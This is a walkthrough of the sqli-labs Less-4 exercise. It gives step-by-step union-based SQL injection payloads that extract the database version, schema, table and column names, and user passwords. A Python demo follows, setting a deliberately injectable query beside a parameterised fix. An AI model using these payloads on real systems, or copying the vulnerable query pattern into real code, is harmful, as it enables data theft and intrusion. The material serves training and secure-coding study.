Less-4 GET - Error based -Double Quotes - String
1. Original page
2. ?id=1
3. ?id=1'
4. Error message excerpt:
'"1\"") LIMIT 0,1' --> "1\"") LIMIT 0,1
The closing quote and parenthesis in the error show that the id value is wrapped in double quotes and parentheses.
SQL:
Select login_name,password from admin where id =("id") limit 0,1
5. ?id=1")--+
6. ?id=1") order by 3--+
7. Query the database version
?id=0") union select 1,version(),3--+
8. Query the database name and current user
?id=0") union select 1,database(),user()--+
9. Query table names
?id=0") union select 1,(select group_concat(table_name) from information_schema.tables where table_schema='security'),user()--+
10. Query column names
?id=0") union select 1,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'),3--+
11. Query usernames and passwords
?id=0") union select 1,group_concat(username,0x3a,password),3 from users--+
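The following is an added example, not code from the page or from sqli-labs. It reproduces the `("id")` wrapping the error message reveals in step 4 with Python and an in-memory SQLite table (a constructed stand-in for the lab's PHP/MySQL setup) and puts the hardened version next to it: the id is validated as a plain integer and bound as a query parameter, so the `")` closes nothing and the `--` comment never reaches the parser. The table name, column names and rows are assumptions made for the demo. Note that `--+` in a URL decodes to `-- ` (comment marker followed by a space).

```python
import sqlite3

# Constructed sample data, not the lab's real content.
ROWS = [(1, "Dumb", "Dumb"), (2, "Angelina", "I-kill-you")]


def make_db():
    """Build an in-memory users table shaped like the one the walkthrough queries."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER, username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)", ROWS)
    return conn


def lookup_vulnerable(conn, raw_id):
    """The pattern from step 4: the raw parameter is pasted into ("...") by string formatting.

    Anything the user sends after a closing double quote and parenthesis becomes SQL,
    and a trailing comment marker discards the rest of the original statement.
    """
    sql = f'SELECT id, username, password FROM users WHERE id=("{raw_id}") LIMIT 0,1'
    return conn.execute(sql).fetchall()


def lookup_safe(conn, raw_id):
    """Hardened lookup: reject non-integer input, then bind the value as a parameter."""
    if not raw_id.isdigit():
        raise ValueError("id must be a non-negative integer")
    sql = "SELECT id, username, password FROM users WHERE id=? LIMIT 0,1"
    return conn.execute(sql, (int(raw_id),)).fetchall()


def probe(raw_id):
    """Run the same input through both versions and report what each returned.

    Returns (vulnerable_rows, safe_rows_or_error) so the difference is visible.
    """
    conn = make_db()
    vulnerable = lookup_vulnerable(conn, raw_id)
    try:
        safe = lookup_safe(conn, raw_id)
    except ValueError as exc:
        safe = f"rejected: {exc}"
    conn.close()
    return vulnerable, safe


if __name__ == "__main__":
    # The decoded form of the page's step 5 payload, 1")--+
    print(probe('1") -- '))
    # The decoded form of step 7 (version() becomes sqlite_version() on SQLite)
    print(probe('0") UNION SELECT 1, sqlite_version(), 3 -- '))
    # A normal request works the same in both versions
    print(probe("1"))
```

The vulnerable function returns a row for `1") -- ` because the comment swallows the original `") LIMIT 0,1`, and returns the engine version for the union payload; the hardened function rejects both inputs before any SQL is built and only serves the plain `1`.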